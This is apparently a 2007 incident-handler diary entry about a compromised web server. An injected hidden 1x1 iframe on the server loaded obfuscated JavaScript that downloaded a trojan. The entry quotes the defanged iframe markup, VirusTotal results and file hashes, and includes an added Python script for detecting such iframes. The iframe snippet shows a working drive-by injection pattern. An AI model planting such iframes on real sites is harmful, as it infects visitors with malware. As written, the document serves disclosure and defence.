Iframe > malicious javascript > trojan

Another iframe on a compromised server, pointing to JavaScript that in turn downloads malware. Jeff wrote in to tell us about a web server that had an iframe like this:

<bo dy><i frame src='hxxp:// index.php' width='1' height='1' style='visibility: hidden;'></i frame>

The decoded JavaScript at index.php then downloaded and ran hxxp:// file.php, a binary PE trojan.
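As an added defender-side example (not part of the diary), a small Python audit that flags iframes carrying the indicators seen above: 1x1 dimensions, CSS hiding, and a source on a host other than the site's own. The sample HTML and the attacker.invalid host are constructed placeholders; own_host is an assumed parameter naming the audited site.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page: one legitimate same-site iframe plus one injected
# hidden 1x1 iframe modelled on the diary's indicator (host is a placeholder).
SAMPLE_HTML = """
<html><body>
<iframe src="/video/player" width="300" height="200"></iframe>
<p>Welcome</p>
<iframe src='http://attacker.invalid/index.php' width='1' height='1'
        style='visibility: hidden;'></iframe>
</body></html>
"""

_DIM_RE = re.compile(r"^\s*(\d+)")

def _tiny(value):
    """True if a width/height attribute resolves to 1px or less."""
    m = _DIM_RE.match(value or "")
    return bool(m) and int(m.group(1)) <= 1

class IframeAuditor(HTMLParser):
    """Collect every <iframe> together with the reasons it looks injected."""
    def __init__(self, own_host):
        super().__init__()
        self.own_host = own_host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = dict(attrs)  # html.parser lowercases tag and attribute names
        src = a.get("src") or ""
        style = (a.get("style") or "").replace(" ", "").lower()
        host = urlparse(src).hostname  # None for relative (same-site) URLs
        reasons = []
        if _tiny(a.get("width")) and _tiny(a.get("height")):
            reasons.append("1x1 dimensions")
        if "visibility:hidden" in style or "display:none" in style:
            reasons.append("hidden via CSS")
        if host and host.lower() != self.own_host:
            reasons.append("off-site source")
        if reasons:
            self.findings.append((src, reasons))

def audit_iframes(html, own_host):
    """Return [(src, [reasons]), ...] for every suspicious iframe in html."""
    p = IframeAuditor(own_host)
    p.feed(html)
    return p.findings
```

Run it over the files in a web root and treat any iframe with two or more reasons as a likely injection worth a manual look.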

Here is what VirusTotal had to say about file.php:

AntiVir 06.05.2007 TR/Small.MI.25
AVG 06.05.2007 Generic4.SJO
BitDefender 7.2 06.05.2007 Trojan.Agent.AXB
DrWeb 4.33 06.05.2007 Trojan.DownLoader.23162
eSafe 06.05.2007 Win32.Small.mi
eTrust-Vet 30.7.3693 06.05.2007 Win32/Chepvil!generic
Ewido 4.0 06.05.2007 Trojan.Small.mi
F-Secure 6.70.13030.0 06.05.2007 Trojan.Win32.Small.mi
Ikarus T3.1.1.8 06.05.2007 Trojan.Win32.Small.mi
Kaspersky 06.05.2007 Trojan.Win32.Small.mi
Microsoft 1.2503 06.05.2007 TrojanDownloader:Win32/Agent!EF3C
Norman 5.80.02 06.05.2007 W32/Smalltroj.BHMK
Prevx1 V2 06.05.2007 Polynomial.Code.Exploit
Sophos 4.18.0 06.01.2007 Mal/Clagger-E
TheHacker 06.04.2007 Trojan/Small.mi
VirusBuster 4.3.23:9 06.05.2007 no virus found
Webwasher-Gateway 6.0.1 06.05.2007 Trojan.Small.MI.25

Additional Information
File size: 6767 bytes
MD5: 3cefdebc529c408c8ba9ef20a0b6291c
SHA1: 4d3599829828e90f6e27b886c9ee403163fc91f6
Prevx info: http://fileinfo.prevx.com/fileinfo.asp?PXC=e09499856113

The server has since had the iframe removed. The owner was a little less than gracious when we spoke this morning. He was aware that it was compromised and infecting web users. If you are notified that a system you run or own is involved in an incident please take action as soon as you can.

Adrien de Beaupre

ISC Handler
Jun 5th 2007
